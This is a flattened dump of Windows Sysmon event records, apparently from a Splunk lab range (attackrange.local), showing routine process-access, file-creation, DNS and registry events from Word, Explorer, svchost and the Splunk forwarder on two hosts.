19:19:11.321{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095420Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095419Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095418Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095417Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.320{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095416Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.142{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF457A92F38376249953E88969735D24,SHA256=7923D919D813D3F570B9194D0EFAFA77936C8C4A1AC5542BD7FBD16EC037CF77,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001606880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 734700x80000000000000001606879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 23542300x80000000000000001606878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C690E55C-3200-4E0D-8E4A-2DA4B6496C42}.tmpMD5=1AC426391380A9A53F1ACE4066AF30F3,SHA256=CA1867E710CDB95EFB0CDFDBC7A43142C0615343B8A67CD77BA0CBA64116F3A9falsefalse - insufficient disk space 12241200x80000000000000001606877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348 12241200x80000000000000001606876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteValue2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0 13241300x80000000000000001606875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\3348\0Binary Data 12241200x80000000000000001606874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\3348 23542300x80000000000000001606873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-walMD5=5D28C7DCB62E9C29C68E6577E82AAE37,SHA256=71BFB6BA45A8FA9603753D727364471B7D7226BB46051884A8D6B60E4DEDB6D1falsefalse - insufficient disk space 23542300x80000000000000001606872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.273{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shmMD5=D70DA974B87C93303CD6ED1520C9577D,SHA256=692E6DB71F536F6B23028CB7BD31B0017581BB4869B123E3AD15234DFC33CF0Cfalsefalse - insufficient disk space 11241100x80000000000000001606890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.914{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.914{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFC382821E26845452A90361329B47E,SHA256=F048D95B70C89F081E0A14B99733450EFB7BC68086A7BCD0FA81D011EF09D0EAfalsefalse - insufficient disk space 10341000x80000000000000001095432Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095431Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095430Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.328{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B211E02C89B056D090F473708FEE3DB4,SHA256=ADB34D20583A48866279A1707FCDB0441E2E5C04B76CEEB0BBA1B8DB2A2A619A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095429Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:12.149{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D07DC732F1B272B8D72BB1745B9F9BFD,SHA256=5D39B3CBCC801E2E7205BDCBF9B6463A5076AA132606A3F1A77F7BB95F795D72,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001606888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.799{21761711-65C9-6080-565E-00000000BB01}3348self.events.data.microsoft.com0type: 5 self-events-data.trafficmanager.net;type: 5 skypedataprdcoleus03.cloudapp.net;::ffff:52.114.132.23;C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 13241300x80000000000000001606887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:12.676{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 11241100x80000000000000001606886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.059{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-04-19 13:20:46.436 23542300x80000000000000001606885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:12.059{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=7954826F946673ABBC089F26389AEE94,SHA256=B95DD14BCA5D3C40A273D2B9D3FEB217C0FBA931D75D658043ADCDCC9649BFCCfalsefalse - insufficient disk space 12241200x80000000000000001606932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 13241300x80000000000000001606930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 12241200x80000000000000001606928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.999{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 13241300x80000000000000001606919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 13241300x80000000000000001606917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirectionDWORD (0x00000001) 13241300x80000000000000001606916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PIDDWORD (0x00000002) 13241300x80000000000000001606915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29} 13241300x80000000000000001606914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupViewDWORD (0xffffffff) 13241300x80000000000000001606913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfoBinary Data 13241300x80000000000000001606912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\SortBinary Data 13241300x80000000000000001606911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSizeDWORD (0x00000030) 13241300x80000000000000001606910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlagsDWORD (0x41200011) 13241300x80000000000000001606909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewModeDWORD (0x00000002) 13241300x80000000000000001606908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ModeDWORD (0x00000006) 13241300x80000000000000001606907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid{65F125E5-7BE1-4810-BA9D-D271C8432CE3} 13241300x80000000000000001606906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlagsDWORD (0x41200001) 13241300x80000000000000001606905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\RevDWORD (0x00000000) 12241200x80000000000000001606904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} 12241200x80000000000000001606903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.998{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:13.997{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:13.997{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 11241100x80000000000000001606898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.917{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:13.917{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5366E31C4823D76F479B614EF7CD55F4,SHA256=6FFCB4E270500F2E7E864991587CBBAD2448AE92B50D302F738A3B1329177D74falsefalse - insufficient disk space 10341000x80000000000000001095435Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:13.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095434Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 